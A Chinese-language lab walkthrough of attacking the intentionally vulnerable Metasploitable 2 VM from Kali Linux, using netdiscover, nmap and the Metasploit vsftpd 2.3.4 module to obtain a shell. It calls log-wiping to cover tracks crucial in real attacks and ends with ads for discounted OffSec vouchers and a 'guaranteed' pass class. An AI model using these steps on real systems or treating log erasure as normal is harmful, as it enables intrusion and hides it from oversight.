使用 Kali Linux 入侵 Metasploitable 2 虚拟机
Metasploitable 2 是一台故意设计成不安全的虚拟机,旨在帮助渗透测试人员入门黑客世界。这台机器充满了安全漏洞和过时/未打补丁的软件。
第一步:信息收集
我使用的是运行在 Oracle VM VirtualBox 上的 Kali Linux 2024.2。首先,我们需要识别目标机器的 IP 地址。有多种方式可以做到这一点,我个人最喜欢使用的工具是 netdiscover
。
netdiscover
是一款可以识别当前网络中设备的工具,它会显示如 MAC 地址、厂商名称等有用信息。使用以下命令:
bash
复制编辑
sudo netdiscover -r <你的网关 IP 地址>/24
示例:
bash
复制编辑
sudo netdiscover -r 10.22.14.0/24
现在我们已经找到目标 IP,作为一台服务器,它通常会开放 80 和 443 端口。接下来我们使用 nmap
来扫描端口:
bash
复制编辑
nmap <目标 IP 地址>
确定目标主机后,就进入下一阶段。
第二步:扫描分析
现在我们要扫描目标系统的漏洞。这一步主要是查找开放端口的服务信息等。黑客常用的工具就是 nmap
,通过一些参数组合我们可以获取更多目标系统的信息。
bash
复制编辑
sudo nmap -sV -O <目标 IP>
通过这次扫描,我们识别出了开放的端口以及其运行的软件版本。我们还发现目标系统的操作系统是 Linux 2.6。
第三步:漏洞利用
现在是时候对目标服务进行漏洞利用了。在网上搜索后可以发现,FTP 服务使用的是 vsftpd 2.3.4
,这是一个众所周知的漏洞服务,可通过 Metasploit 进行攻击。
输入命令打开 msfconsole
:
bash
复制编辑
msfconsole
打开后,输入以下命令搜索对应的漏洞利用模块:
bash
复制编辑
search vsftpd
我们找到了一个可以用来反弹 shell 的漏洞利用模块。使用以下命令启用该模块:
bash
复制编辑
use <exploit_模块名>
然后设置目标地址:
bash
复制编辑
set RHOSTS <目标 IP>
最后运行攻击:
bash
复制编辑
exploit
一旦成功执行并建立起 shell 会话,输入以下命令确认是否获取了访问权限:
bash
复制编辑
uname -a
从图中可以看到命令成功执行了。恭喜!!我们已经成功入侵了系统!
第四步:后渗透和清除痕迹
一旦成功入侵系统,就需要清除痕迹。在本次实验中,我们入侵的是一台用于练习的虚拟靶机,因此我会跳过这一步。但在真实世界中,这一步至关重要。最常见的方式是清除所有与自己活动相关的日志。
第五步:撰写报告
渗透测试完成后,接下来就是整理报告。确保你已经收集好证据,并将你的发现记录下来。
Offsec考试券找我有折扣价,另有Offsec系列的保障班,保障意思您一定懂!
CEH免费学,评论区留言,一个个排队开通课程!